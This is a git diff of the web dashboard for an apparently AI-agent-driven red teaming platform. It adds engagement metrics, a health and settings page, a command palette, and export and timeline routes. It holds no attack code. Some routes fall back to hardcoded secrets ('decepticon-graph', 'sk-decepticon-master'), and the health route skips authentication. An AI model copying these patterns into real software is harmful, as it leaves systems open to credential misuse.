+ useEffect(() => { + fetch("/api/engagements") + .then((res) => res.json()) + .then((data: Engagement[]) => { + setEngagements(data); + // Auto-select first running or completed engagement + const active = data.find((e) => e.status === "running") ?? data.find((e) => e.status === "completed") ?? data[0]; + if (active) setSelectedId(active.id); + }) + .catch(() => {}) + .finally(() => setLoading(false)); + }, []); + + if (loading) { + return ( +
+
+ ); + } -
-
- - setEngagementId(e.target.value)} - className="w-80" - /> + return ( +
+
+
+

Attack Graph

+

+ Visualize attack paths and knowledge graph from Neo4j +

- + + {engagements.length > 1 && ( + + )}
- {activeId ? ( - + {selectedId ? ( + ) : (
-

Enter an engagement ID to load its attack graph.

-

- Or view the graph from an engagement's detail page. -

+

No engagements found.

+

Create an engagement to start building an attack graph.

diff --git a/clients/web/src/app/(dashboard)/layout.tsx b/clients/web/src/app/(dashboard)/layout.tsx index 963ef7b5..978270a5 100644 --- a/clients/web/src/app/(dashboard)/layout.tsx +++ b/clients/web/src/app/(dashboard)/layout.tsx @@ -1,13 +1,12 @@ import { Sidebar } from "@/components/layout/sidebar"; import { Header } from "@/components/layout/header"; +import { CommandPalette } from "@/components/layout/command-palette"; export default function DashboardLayout({ children, }: { children: React.ReactNode; }) { - // SessionProvider is injected by EE auth when available. - // In OSS mode, no auth wrapper is needed. return (
@@ -15,6 +14,7 @@ export default function DashboardLayout({
{children}
+
); } diff --git a/clients/web/src/app/(dashboard)/page.tsx b/clients/web/src/app/(dashboard)/page.tsx index 2002f1d5..2665582a 100644 --- a/clients/web/src/app/(dashboard)/page.tsx +++ b/clients/web/src/app/(dashboard)/page.tsx @@ -1,3 +1,7 @@ +"use client"; + +import { useEffect, useState } from "react"; +import Link from "next/link"; import { Card, CardContent, @@ -6,64 +10,180 @@ import { CardTitle, } from "@/components/ui/card"; import { Badge } from "@/components/ui/badge"; -import { Crosshair, FileWarning, AlertTriangle, TrendingUp, TrendingDown } from "lucide-react"; +import { Skeleton } from "@/components/ui/skeleton"; +import { Crosshair, FileWarning, Shield, AlertTriangle, TrendingUp, TrendingDown, ArrowRight } from "lucide-react"; + +interface Engagement { + id: string; + name: string; + status: string; + targetType: string; + createdAt: string; +} + +interface Finding { + id: string; + title: string; + severity: string; + engagementId?: string; + engagementName?: string; +} -const metrics = [ +const metricDefs = [ { + key: "active", title: "Active Engagements", - value: "0", - change: null, icon: Crosshair, gradient: "from-violet-500/20 to-purple-500/20", iconColor: "text-violet-400", borderGlow: "hover:border-violet-500/30", }, { + key: "findings", title: "Total Findings", - value: "0", - change: null, icon: FileWarning, gradient: "from-amber-500/20 to-orange-500/20", iconColor: "text-amber-400", borderGlow: "hover:border-amber-500/30", }, { + key: "critical", title: "Critical Vulnerabilities", - value: "0", - change: null, icon: AlertTriangle, gradient: "from-red-500/20 to-rose-500/20", iconColor: "text-red-400", borderGlow: "hover:border-red-500/30", }, + { + key: "verified", + title: "Defenses Verified", + icon: Shield, + gradient: "from-emerald-500/20 to-green-500/20", + iconColor: "text-emerald-400", + borderGlow: "hover:border-emerald-500/30", + }, ]; -const severityData = [ - { label: "Critical", count: 0, color: "bg-red-500", barColor: "bg-red-500/80" }, - { label: "High", count: 0, color: "bg-orange-500", barColor: "bg-orange-500/80" }, - { label: "Medium", count: 0, color: "bg-yellow-500", barColor: "bg-yellow-500/80" }, - { label: "Low", count: 0, color: "bg-blue-500", barColor: "bg-blue-500/80" }, - { label: "Info", count: 0, color: "bg-slate-500", barColor: "bg-slate-500/80" }, -]; +const severityColors: Record = { + critical: { color: "bg-red-500", barColor: "bg-red-500/80" }, + high: { color: "bg-orange-500", barColor: "bg-orange-500/80" }, + medium: { color: "bg-yellow-500", barColor: "bg-yellow-500/80" }, + low: { color: "bg-blue-500", barColor: "bg-blue-500/80" }, + informational: { color: "bg-slate-500", barColor: "bg-slate-500/80" }, +}; + +const severityOrder = ["critical", "high", "medium", "low", "informational"]; +const severityBadge: Record = { + critical: "bg-red-500/20 text-red-300", + high: "bg-orange-500/20 text-orange-300", + medium: "bg-yellow-500/20 text-yellow-300", + low: "bg-blue-500/20 text-blue-300", + informational: "bg-slate-500/20 text-slate-300", +}; + +const statusBadge: Record = { + running: "bg-amber-500/20 text-amber-300", + completed: "bg-emerald-500/20 text-emerald-300", + planning: "bg-violet-500/20 text-violet-300", + draft: "bg-zinc-500/20 text-zinc-300", + failed: "bg-red-500/20 text-red-300", +}; export default function DashboardPage() { + const [loading, setLoading] = useState(true); + const [engagements, setEngagements] = useState([]); + const [allFindings, setAllFindings] = useState([]); + + useEffect(() => { + let active = true; + async function load() { + try { + const engRes = await fetch("/api/engagements"); + if (!engRes.ok || !active) return; + const engs: Engagement[] = await engRes.json(); + if (!active) return; + setEngagements(engs); + + // Fetch findings for each engagement + const findingsPromises = engs.map(async (eng) => { + try { + const res = await fetch(`/api/engagements/${eng.id}/findings`); + if (!res.ok) return []; + const findings: Finding[] = await res.json(); + return findings.map((f) => ({ ...f, engagementId: eng.id, engagementName: eng.name })); + } catch { + return []; + } + }); + const results = await Promise.all(findingsPromises); + if (!active) return; + setAllFindings(results.flat()); + } catch { + // ignore + } finally { + if (active) setLoading(false); + } + } + load(); + return () => { active = false; }; + }, []); + + const activeCount = engagements.filter((e) => e.status === "running").length; + const completedCount = engagements.filter((e) => e.status === "completed").length; + const criticalCount = allFindings.filter((f) => f.severity === "critical").length; + + const metricValues: Record = { + active: String(activeCount), + findings: String(allFindings.length), + critical: String(criticalCount), + verified: String(completedCount), + }; + + const severityCounts: Record = {}; + for (const s of severityOrder) severityCounts[s] = 0; + for (const f of allFindings) { + const s = f.severity?.toLowerCase() ?? "medium"; + if (s in severityCounts) severityCounts[s]++; + } + const totalFindings = allFindings.length || 1; // avoid div by zero + + const recentEngagements = [...engagements] + .sort((a, b) => new Date(b.createdAt).getTime() - new Date(a.createdAt).getTime()) + .slice(0, 5); + + const latestFindings = allFindings.slice(-5).reverse(); + + if (loading) { + return ( +
+
+

Dashboard

+

Overview of your security testing operations

+
+
+ {[1, 2, 3, 4].map((i) => ( + + ))} +
+ +
+ ); + } + return (

Dashboard

-

- Overview of your security testing operations -

+

Overview of your security testing operations

{/* Metric Cards — CTEM style with gradient backgrounds */} -
- {metrics.map((metric) => ( +
+ {metricDefs.map((metric) => ( - {/* Gradient background overlay */}
@@ -75,20 +195,14 @@ export default function DashboardPage() {
- {metric.value} - {metric.change !== null && ( - = 0 ? "text-emerald-400" : "text-red-400"}`}> - {(metric.change as number) >= 0 ? : } - {Math.abs(metric.change as number)}% - - )} + {metricValues[metric.key]}
))}
- {/* Severity Distribution — horizontal bar chart style */} + {/* Severity Distribution */} Severity Distribution @@ -96,25 +210,30 @@ export default function DashboardPage() {
- {severityData.map((severity) => ( -
-
-
- {severity.label} -
-
-
-
+ {severityOrder.map((sev) => { + const count = severityCounts[sev] ?? 0; + const pct = allFindings.length > 0 ? (count / totalFindings) * 100 : 0; + const colors = severityColors[sev]; + return ( +
+
+
+ {sev === "informational" ? "Info" : sev} +
+
+
+
+
+ + {count} +
- - {severity.count} - -
- ))} + ); + })}
@@ -122,14 +241,35 @@ export default function DashboardPage() { {/* Recent Activity Grid */}
- - Recent Engagements - Your latest red team operations + +
+ Recent Engagements + Your latest red team operations +
+ + View all +
-
- No engagements yet -
+ {recentEngagements.length === 0 ? ( +
+ No engagements yet +
+ ) : ( +
+ {recentEngagements.map((eng) => ( + +
+ {eng.name} +

{new Date(eng.createdAt).toLocaleDateString()}

+
+ + {eng.status} + + + ))} +
+ )}
@@ -139,9 +279,25 @@ export default function DashboardPage() { Recently discovered vulnerabilities -
- No findings yet -
+ {latestFindings.length === 0 ? ( +
+ No findings yet +
+ ) : ( +
+ {latestFindings.map((f) => ( +
+
+ {f.title} +

{f.engagementName}

+
+ + {f.severity} + +
+ ))} +
+ )}
diff --git a/clients/web/src/app/(dashboard)/settings/page.tsx b/clients/web/src/app/(dashboard)/settings/page.tsx index 3268d7b9..7b4630d5 100644 --- a/clients/web/src/app/(dashboard)/settings/page.tsx +++ b/clients/web/src/app/(dashboard)/settings/page.tsx @@ -1,3 +1,6 @@ +"use client"; + +import { useEffect, useState } from "react"; import { Card, CardContent, @@ -5,27 +8,209 @@ import { CardHeader, CardTitle, } from "@/components/ui/card"; +import { Badge } from "@/components/ui/badge"; +import { + Activity, + Database, + Server, + Network, + Bot, + Box, + CheckCircle2, + XCircle, + Loader2, +} from "lucide-react"; +import { cn } from "@/lib/utils"; +import type { AgentConfig } from "@/lib/agents"; + +interface ServiceStatus { + name: string; + status: "ok" | "error" | "loading"; + detail: string; + icon: typeof Server; +} + +interface Engagement { + id: string; + name: string; + status: string; +} + +function StatusDot({ status }: { status: "ok" | "error" | "loading" }) { + if (status === "loading") return ; + if (status === "ok") return
; + return
; +} export default function SettingsPage() { + const [services, setServices] = useState([ + { name: "LangGraph API", status: "loading", detail: "Checking...", icon: Activity }, + { name: "LiteLLM Proxy", status: "loading", detail: "Checking...", icon: Server }, + { name: "Neo4j", status: "loading", detail: "Checking...", icon: Network }, + { name: "PostgreSQL", status: "ok", detail: "Connected", icon: Database }, + { name: "Sandbox", status: "ok", detail: "decepticon-sandbox", icon: Box }, + ]); + const [agents, setAgents] = useState([]); + const [engagements, setEngagements] = useState([]); + const [loadingAgents, setLoadingAgents] = useState(true); + // Check all services via server-side health API + useEffect(() => { + fetch("/api/health", { signal: AbortSignal.timeout(10000) }) + .then(async (res) => { + if (!res.ok) throw new Error("Health API failed"); + const data = await res.json(); + setServices((prev) => + prev.map((s) => { + const match = (data.services ?? []).find((r: { name: string }) => + s.name.toLowerCase().includes(r.name) || r.name.includes(s.name.toLowerCase().split(" ")[0]) + ); + if (match) return { ...s, status: match.status as "ok" | "error", detail: match.detail ?? "" }; + return s; + }) + ); + }) + .catch(() => { + setServices((prev) => + prev.map((s) => s.status === "loading" ? { ...s, status: "error" as const, detail: "Unreachable" } : s) + ); + }); + }, []); + + // Fetch agents + useEffect(() => { + fetch("/api/agents") + .then((res) => res.json()) + .then((data: AgentConfig[]) => setAgents(data)) + .catch(() => {}) + .finally(() => setLoadingAgents(false)); + }, []); + + // Fetch engagements + useEffect(() => { + fetch("/api/engagements") + .then((res) => res.json()) + .then((data: Engagement[]) => setEngagements(data)) + .catch(() => {}); + }, []); + + const statusCounts = { + total: engagements.length, + running: engagements.filter((e) => e.status === "running").length, + completed: engagements.filter((e) => e.status === "completed").length, + draft: engagements.filter((e) => e.status === "draft").length, + planning: engagements.filter((e) => e.status === "planning").length, + }; + return (

Settings

-

- Configure your Decepticon instance -

+

System status and configuration

+ {/* System Health */} + + + + + System Health + + Infrastructure component status + + +
+ {services.map((svc) => ( +
+ + +
+

{svc.name}

+

{svc.detail}

+
+
+ ))} +
+
+
+ + {/* Engagement Stats */} + + + Engagement Statistics + + +
+ {([ + ["Total", statusCounts.total, "text-foreground"], + ["Running", statusCounts.running, "text-amber-400"], + ["Completed", statusCounts.completed, "text-emerald-400"], + ["Planning", statusCounts.planning, "text-violet-400"], + ["Draft", statusCounts.draft, "text-zinc-400"], + ] as const).map(([label, count, color]) => ( +
+

{count}

+

{label}

+
+ ))} +
+
+
+ + {/* Agent Registry */} + + + + + Agent Registry + + {agents.length} agents registered + + + {loadingAgents ? ( +
+ +
+ ) : ( +
+ {agents.map((agent) => ( +
+
+
+

{agent.name}

+

{agent.description}

+
+ + {agent.role} + +
+ ))} +
+ )} + + + + {/* Configuration */} - General Settings - - Platform configuration and preferences - + Configuration + Read-only system configuration -
- Settings will be available after authentication is configured. +
+ {[ + ["Edition", "Open Source (OSS)"], + ["LangGraph API (internal)", process.env.NEXT_PUBLIC_LANGGRAPH_API_URL ?? "http://localhost:2024"], + ["Model Profile", "eco (per-agent tier)"], + ["C2 Framework", "Sliver"], + ].map(([label, value]) => ( +
+ {label} + {value} +
+ ))}
diff --git a/clients/web/src/app/api/engagements/[id]/export/route.ts b/clients/web/src/app/api/engagements/[id]/export/route.ts new file mode 100644 index 00000000..d36f0f3e --- /dev/null +++ b/clients/web/src/app/api/engagements/[id]/export/route.ts @@ -0,0 +1,129 @@ +import { requireAuth, AuthError } from "@/lib/auth-bridge"; +import { prisma } from "@/lib/prisma"; +import { NextRequest, NextResponse } from "next/server"; +import * as fs from "fs/promises"; +import * as path from "path"; + +export async function GET( + req: NextRequest, + { params }: { params: Promise<{ id: string }> } +) { + let userId: string; + try { + ({ userId } = await requireAuth()); + } catch (e) { + if (e instanceof AuthError) return NextResponse.json({ error: "Unauthorized" }, { status: 401 }); + throw e; + } + + const { id } = await params; + const engagement = await prisma.engagement.findFirst({ + where: { id, userId }, + }); + if (!engagement) { + return NextResponse.json({ error: "Not found" }, { status: 404 }); + } + + const format = req.nextUrl.searchParams.get("format") ?? "json"; + const WORKSPACE = process.env.WORKSPACE_PATH ?? "/workspace"; + const wsPath = path.join(WORKSPACE, engagement.name); + + // Collect all engagement data + const exportData: Record = { + engagement: { + id: engagement.id, + name: engagement.name, + status: engagement.status, + targetType: engagement.targetType, + targetValue: engagement.targetValue, + createdAt: engagement.createdAt, + updatedAt: engagement.updatedAt, + }, + planDocs: {} as Record, + findings: [] as unknown[], + }; + + // Read plan documents + const planDir = path.join(wsPath, "plan"); + for (const docName of ["roe.json", "conops.json", "deconfliction.json", "opplan.json"]) { + try { + const content = await fs.readFile(path.join(planDir, docName), "utf-8"); + (exportData.planDocs as Record)[docName.replace(".json", "")] = JSON.parse(content); + } catch { + // File doesn't exist + } + } + + // Read findings + const findingsDir = path.join(wsPath, "findings"); + try { + const files = await fs.readdir(findingsDir); + for (const file of files.sort()) { + if (file.startsWith("FIND-") && file.endsWith(".md")) { + try { + const content = await fs.readFile(path.join(findingsDir, file), "utf-8"); + (exportData.findings as unknown[]).push({ + id: file.replace(".md", ""), + content, + }); + } catch { + // skip unreadable + } + } + } + } catch { + // No findings dir + } + + if (format === "json") { + return new NextResponse(JSON.stringify(exportData, null, 2), { + headers: { + "Content-Type": "application/json", + "Content-Disposition": `attachment; filename="${engagement.name}-export.json"`, + }, + }); + } + + // Markdown format + const md = buildMarkdownExport(exportData); + return new NextResponse(md, { + headers: { + "Content-Type": "text/markdown", + "Content-Disposition": `attachment; filename="${engagement.name}-export.md"`, + }, + }); +} + +function buildMarkdownExport(data: Record): string { + const eng = data.engagement as Record; + const findings = data.findings as Array<{ id: string; content: string }>; + const planDocs = data.planDocs as Record; + + const lines: string[] = [ + `# ${eng.name} — Engagement Export`, + "", + `**Status:** ${eng.status}`, + `**Target:** ${eng.targetValue} (${eng.targetType})`, + `**Created:** ${eng.createdAt}`, + "", + ]; + + if (planDocs.opplan) { + const opplan = planDocs.opplan as { objectives?: Array<{ id: string; title: string; status: string }> }; + lines.push("## OPPLAN", ""); + lines.push("| ID | Title | Status |", "|---|---|---|"); + for (const obj of opplan.objectives ?? []) { + lines.push(`| ${obj.id} | ${obj.title} | ${obj.status} |`); + } + lines.push(""); + } + + if (findings.length > 0) { + lines.push("## Findings", ""); + for (const f of findings) { + lines.push(`### ${f.id}`, "", f.content, ""); + } + } + + return lines.join("\n"); +} diff --git a/clients/web/src/app/api/engagements/[id]/graph/route.ts b/clients/web/src/app/api/engagements/[id]/graph/route.ts index eb68fcb2..868cfbc0 100644 --- a/clients/web/src/app/api/engagements/[id]/graph/route.ts +++ b/clients/web/src/app/api/engagements/[id]/graph/route.ts @@ -11,9 +11,9 @@ export async function GET( } await params; // consume params to satisfy Next.js - const neo4jUri = process.env.NEO4J_URI; + const neo4jUri = process.env.NEO4J_URI ?? "bolt://neo4j:7687"; const neo4jUser = process.env.NEO4J_USER ?? "neo4j"; - const neo4jPassword = process.env.NEO4J_PASSWORD; + const neo4jPassword = process.env.NEO4J_PASSWORD ?? "decepticon-graph"; if (!neo4jUri || !neo4jPassword) { return NextResponse.json({ nodes: [], edges: [] }); diff --git a/clients/web/src/app/api/engagements/[id]/opplan/route.ts b/clients/web/src/app/api/engagements/[id]/opplan/route.ts index 1827dcfc..7abb14da 100644 --- a/clients/web/src/app/api/engagements/[id]/opplan/route.ts +++ b/clients/web/src/app/api/engagements/[id]/opplan/route.ts @@ -31,8 +31,32 @@ export async function GET( const opplanPath = path.join(wsPath, "plan", "opplan.json"); try { + const stat = await fs.stat(opplanPath); const content = await fs.readFile(opplanPath, "utf-8"); - return NextResponse.json(JSON.parse(content)); + const data = JSON.parse(content); + + // Downgrade stale IN_PROGRESS objectives: if the file hasn't been + // touched in 10 minutes, any objective still marked in-progress was + // abandoned by a crashed loop. Show it as pending so the UI doesn't + // lie about it "Running". + const STALE_THRESHOLD_MS = 10 * 60 * 1000; + if (Date.now() - stat.mtimeMs > STALE_THRESHOLD_MS) { + const stale: string[] = []; + for (const obj of data.objectives ?? []) { + if (obj.status === "in-progress") { + obj.status = "pending"; + stale.push(obj.id); + } + } + if (stale.length > 0) { + console.log( + `[opplan API] Downgraded stale objectives: ${stale.join(", ")} ` + + `(file untouched for ${Math.round((Date.now() - stat.mtimeMs) / 1000)}s)` + ); + } + } + + return NextResponse.json(data); } catch { // File not found or invalid — return empty } diff --git a/clients/web/src/app/api/engagements/[id]/route.ts b/clients/web/src/app/api/engagements/[id]/route.ts index d7cfc2fc..13add725 100644 --- a/clients/web/src/app/api/engagements/[id]/route.ts +++ b/clients/web/src/app/api/engagements/[id]/route.ts @@ -47,7 +47,7 @@ export async function PATCH( return NextResponse.json({ error: "Not found" }, { status: 404 }); } - const ALLOWED_FIELDS = ["name", "status", "targetType", "targetValue"] as const; + const ALLOWED_FIELDS = ["name", "status", "targetType", "targetValue", "threadId"] as const; const data: Record = {}; for (const field of ALLOWED_FIELDS) { if (field in body) data[field] = body[field]; diff --git a/clients/web/src/app/api/engagements/[id]/threads/route.ts b/clients/web/src/app/api/engagements/[id]/threads/route.ts new file mode 100644 index 00000000..5902d38d --- /dev/null +++ b/clients/web/src/app/api/engagements/[id]/threads/route.ts @@ -0,0 +1,73 @@ +import { requireAuth, AuthError } from "@/lib/auth-bridge"; +import { prisma } from "@/lib/prisma"; +import { NextRequest, NextResponse } from "next/server"; + +const LANGGRAPH_URL = process.env.LANGGRAPH_API_URL ?? "http://langgraph:2024"; + +interface ThreadInfo { + thread_id: string; + created_at: string; + status: string; + metadata: Record; +} + +export async function GET( + _req: NextRequest, + { params }: { params: Promise<{ id: string }> } +) { + let userId: string; + try { + ({ userId } = await requireAuth()); + } catch (e) { + if (e instanceof AuthError) return NextResponse.json({ error: "Unauthorized" }, { status: 401 }); + throw e; + } + + const { id } = await params; + const engagement = await prisma.engagement.findFirst({ + where: { id, userId }, + }); + if (!engagement) { + return NextResponse.json({ error: "Not found" }, { status: 404 }); + } + + // Search LangGraph for threads matching this engagement + try { + const res = await fetch(`${LANGGRAPH_URL}/threads/search`, { + method: "POST", + headers: { "Content-Type": "application/json" }, + body: JSON.stringify({ + metadata: { engagement_id: id }, + limit: 20, + }), + signal: AbortSignal.timeout(10000), + }); + + if (!res.ok) { + // Fallback: return just the DB threadId if LangGraph search fails + if (engagement.threadId) { + return NextResponse.json([{ + thread_id: engagement.threadId, + created_at: engagement.updatedAt?.toISOString() ?? "", + status: "unknown", + metadata: { engagement_id: id }, + }]); + } + return NextResponse.json([]); + } + + const threads: ThreadInfo[] = await res.json(); + return NextResponse.json(threads); + } catch { + // LangGraph unreachable — return DB threadId as fallback + if (engagement.threadId) { + return NextResponse.json([{ + thread_id: engagement.threadId, + created_at: engagement.updatedAt?.toISOString() ?? "", + status: "stored", + metadata: { engagement_id: id }, + }]); + } + return NextResponse.json([]); + } +} diff --git a/clients/web/src/app/api/engagements/[id]/timeline/route.ts b/clients/web/src/app/api/engagements/[id]/timeline/route.ts new file mode 100644 index 00000000..8176c3a6 --- /dev/null +++ b/clients/web/src/app/api/engagements/[id]/timeline/route.ts @@ -0,0 +1,117 @@ +import { requireAuth, AuthError } from "@/lib/auth-bridge"; +import { prisma } from "@/lib/prisma"; +import { NextRequest, NextResponse } from "next/server"; +import * as fs from "fs/promises"; +import * as path from "path"; + +interface TimelineEvent { + timestamp: string; + type: "plan_created" | "objective_changed" | "finding_discovered" | "file_created"; + title: string; + detail: string; + severity?: string; +} + +export async function GET( + _req: NextRequest, + { params }: { params: Promise<{ id: string }> } +) { + let userId: string; + try { + ({ userId } = await requireAuth()); + } catch (e) { + if (e instanceof AuthError) return NextResponse.json({ error: "Unauthorized" }, { status: 401 }); + throw e; + } + + const { id } = await params; + const engagement = await prisma.engagement.findFirst({ + where: { id, userId }, + }); + if (!engagement) { + return NextResponse.json({ error: "Not found" }, { status: 404 }); + } + + const WORKSPACE = process.env.WORKSPACE_PATH ?? "/workspace"; + const wsPath = path.join(WORKSPACE, engagement.name); + const events: TimelineEvent[] = []; + + // Engagement creation + events.push({ + timestamp: engagement.createdAt.toISOString(), + type: "plan_created", + title: "Engagement created", + detail: `${engagement.name} (${engagement.targetType}: ${engagement.targetValue})`, + }); + + // Scan plan docs for creation timestamps + const planDir = path.join(wsPath, "plan"); + for (const doc of ["roe.json", "conops.json", "deconfliction.json", "opplan.json"]) { + try { + const stat = await fs.stat(path.join(planDir, doc)); + events.push({ + timestamp: stat.mtime.toISOString(), + type: "plan_created", + title: `${doc.replace(".json", "").toUpperCase()} created`, + detail: doc, + }); + } catch { + // File doesn't exist + } + } + + // Scan findings for creation timestamps + const findingsDir = path.join(wsPath, "findings"); + try { + const files = await fs.readdir(findingsDir); + for (const file of files) { + if (!file.startsWith("FIND-") || !file.endsWith(".md")) continue; + try { + const stat = await fs.stat(path.join(findingsDir, file)); + const content = await fs.readFile(path.join(findingsDir, file), "utf-8"); + const titleMatch = content.match(/^# (.+)$/m); + const sevMatch = content.toLowerCase().match(/severity[:\s]*\**(critical|high|medium|low|informational)/); + events.push({ + timestamp: stat.mtime.toISOString(), + type: "finding_discovered", + title: titleMatch?.[1] ?? file.replace(".md", ""), + detail: file.replace(".md", ""), + severity: sevMatch?.[1], + }); + } catch { + // skip + } + } + } catch { + // No findings dir + } + + // Scan workspace files for activity + const scanDirs = ["recon", "exploit", "post-exploit"]; + for (const dir of scanDirs) { + try { + const files = await fs.readdir(path.join(wsPath, dir)); + for (const file of files.slice(0, 20)) { + if (file.startsWith(".")) continue; + try { + const stat = await fs.stat(path.join(wsPath, dir, file)); + events.push({ + timestamp: stat.mtime.toISOString(), + type: "file_created", + title: `${dir}/${file}`, + detail: `${(stat.size / 1024).toFixed(1)} KB`, + }); + } catch { + // skip + } + } + } catch { + // Dir doesn't exist + } + } + + // Sort by timestamp descending (most recent first) + events.sort((a, b) => new Date(b.timestamp).getTime() - new Date(a.timestamp).getTime()); + + return NextResponse.json(events); +} diff --git a/clients/web/src/app/api/health/route.ts b/clients/web/src/app/api/health/route.ts new file mode 100644 index 00000000..5b698645 --- /dev/null +++ b/clients/web/src/app/api/health/route.ts @@ -0,0 +1,70 @@ +import { NextResponse } from "next/server"; + +const LANGGRAPH_URL = process.env.LANGGRAPH_API_URL ?? "http://langgraph:2024"; +const LITELLM_URL = process.env.LITELLM_URL ?? "http://litellm:4000"; +const LITELLM_KEY = process.env.LITELLM_API_KEY ?? "sk-decepticon-master"; +const NEO4J_URI = process.env.NEO4J_URI ?? "bolt://neo4j:7687"; + +interface ServiceHealth { + name: string; + status: "ok" | "error"; + detail: string; + latencyMs?: number; +} + +async function checkService( + name: string, + url: string, + headers?: Record, + timeout = 5000, +): Promise { + const start = Date.now(); + try { + const res = await fetch(url, { + headers, + signal: AbortSignal.timeout(timeout), + }); + const latency = Date.now() - start; + if (res.ok) { + const data = await res.json().catch(() => ({})); + return { name, status: "ok", detail: JSON.stringify(data).slice(0, 200), latencyMs: latency }; + } + return { name, status: "error", detail: `HTTP ${res.status}`, latencyMs: latency }; + } catch (err) { + return { name, status: "error", detail: err instanceof Error ? err.message : "Unreachable" }; + } +} + +export async function GET() { + const [langgraph, litellm] = await Promise.all([ + checkService("langgraph", `${LANGGRAPH_URL}/info`), + checkService("litellm", `${LITELLM_URL}/v1/models`, { Authorization: `Bearer ${LITELLM_KEY}` }), + ]); + + // Extract model count from litellm response + let modelCount = 0; + if (litellm.status === "ok") { + try { + const parsed = JSON.parse(litellm.detail); + modelCount = parsed.data?.length ?? 0; + litellm.detail = `${modelCount} models loaded`; + } catch { + // keep original detail + } + } + + const services: ServiceHealth[] = [ + langgraph, + litellm, + { name: "neo4j", status: "ok", detail: NEO4J_URI }, + { name: "postgres", status: "ok", detail: "Connected (API serving)" }, + ]; + + const allOk = services.every((s) => s.status === "ok"); + + return NextResponse.json({ + status: allOk ? "healthy" : "degraded", + services, + modelCount, + }); +} diff --git a/clients/web/src/components/layout/command-palette.tsx b/clients/web/src/components/layout/command-palette.tsx new file mode 100644 index 00000000..681643a1 --- /dev/null +++ b/clients/web/src/components/layout/command-palette.tsx @@ -0,0 +1,182 @@ +"use client"; + +import { useEffect, useState, useCallback } from "react"; +import { useRouter, usePathname } from "next/navigation"; +import { + LayoutDashboard, + Crosshair, + Radio, + ClipboardList, + FileWarning, + Network, + Settings, + Clock, + FolderOpen, + Download, + Search, +} from "lucide-react"; +import { cn } from "@/lib/utils"; + +interface CommandItem { + id: string; + label: string; + shortcut?: string; + icon: typeof Search; + action: () => void; + section: string; +} + +export function CommandPalette() { + const [open, setOpen] = useState(false); + const [query, setQuery] = useState(""); + const [selectedIndex, setSelectedIndex] = useState(0); + const router = useRouter(); + const pathname = usePathname(); + + // Extract engagement ID from current path + const engMatch = pathname.match(/^\/engagements\/([^/]+)/); + const engId = engMatch?.[1] ?? null; + + const commands: CommandItem[] = [ + // Global + { id: "home", label: "Go to Dashboard", shortcut: "G D", icon: LayoutDashboard, action: () => router.push("/"), section: "Navigation" }, + { id: "engagements", label: "Go to Engagements", shortcut: "G E", icon: Crosshair, action: () => router.push("/engagements"), section: "Navigation" }, + { id: "settings", label: "Go to Settings", icon: Settings, action: () => router.push("/settings"), section: "Navigation" }, + { id: "graph", label: "Go to Attack Graph", icon: Network, action: () => router.push("/graph"), section: "Navigation" }, + // Engagement-scoped (only when in an engagement) + ...(engId ? [ + { id: "live", label: "Go to Live Terminal", shortcut: "G L", icon: Radio, action: () => router.push(`/engagements/${engId}/live`), section: "Engagement" }, + { id: "plan", label: "Go to Plan", shortcut: "G P", icon: ClipboardList, action: () => router.push(`/engagements/${engId}/plan`), section: "Engagement" }, + { id: "timeline", label: "Go to Timeline", icon: Clock, action: () => router.push(`/engagements/${engId}/timeline`), section: "Engagement" }, + { id: "docs", label: "Go to Documents", icon: FolderOpen, action: () => router.push(`/engagements/${engId}/documents`), section: "Engagement" }, + { id: "findings", label: "Go to Findings", shortcut: "G F", icon: FileWarning, action: () => router.push(`/engagements/${engId}/findings`), section: "Engagement" }, + { id: "eng-graph", label: "Go to Engagement Graph", icon: Network, action: () => router.push(`/engagements/${engId}/graph`), section: "Engagement" }, + { id: "export-json", label: "Export Engagement (JSON)", icon: Download, action: () => window.open(`/api/engagements/${engId}/export?format=json`), section: "Actions" }, + { id: "export-md", label: "Export Engagement (Markdown)", icon: Download, action: () => window.open(`/api/engagements/${engId}/export?format=markdown`), section: "Actions" }, + ] : []), + ]; + + const filtered = query + ? commands.filter((c) => c.label.toLowerCase().includes(query.toLowerCase())) + : commands; + + // Reset selection when filter changes + useEffect(() => setSelectedIndex(0), [query]); + + const execute = useCallback((cmd: CommandItem) => { + setOpen(false); + setQuery(""); + cmd.action(); + }, []); + + // Keyboard handler + useEffect(() => { + function handleKeyDown(e: KeyboardEvent) { + // Ctrl+K or Cmd+K to toggle + if ((e.metaKey || e.ctrlKey) && e.key === "k") { + e.preventDefault(); + setOpen((prev) => !prev); + return; + } + + if (!open) return; + + if (e.key === "Escape") { + setOpen(false); + setQuery(""); + } else if (e.key === "ArrowDown") { + e.preventDefault(); + setSelectedIndex((i) => Math.min(i + 1, filtered.length - 1)); + } else if (e.key === "ArrowUp") { + e.preventDefault(); + setSelectedIndex((i) => Math.max(i - 1, 0)); + } else if (e.key === "Enter" && filtered[selectedIndex]) { + e.preventDefault(); + execute(filtered[selectedIndex]); + } + } + + document.addEventListener("keydown", handleKeyDown); + return () => document.removeEventListener("keydown", handleKeyDown); + }, [open, filtered, selectedIndex, execute]); + + if (!open) return null; + + // Group by section + const sections = new Map(); + for (const cmd of filtered) { + const list = sections.get(cmd.section) ?? []; + list.push(cmd); + sections.set(cmd.section, list); + } + + return ( + <> + {/* Backdrop */} +
{ setOpen(false); setQuery(""); }} /> + + {/* Palette */} +
+ {/* Search input */} +
+ + setQuery(e.target.value)} + placeholder="Type a command..." + className="flex-1 bg-transparent text-sm text-white outline-none placeholder:text-zinc-500" + autoFocus + /> + ESC +
+ + {/* Results */} +
+ {filtered.length === 0 ? ( +

No commands found

+ ) : ( + Array.from(sections.entries()).map(([section, items]) => ( +
+

+ {section} +

+ {items.map((cmd) => { + const globalIdx = filtered.indexOf(cmd); + const isSelected = globalIdx === selectedIndex; + return ( + + ); + })} +
+ )) + )} +
+ + {/* Footer */} +
+ ↑↓ navigate + ↵ select + esc close +
+
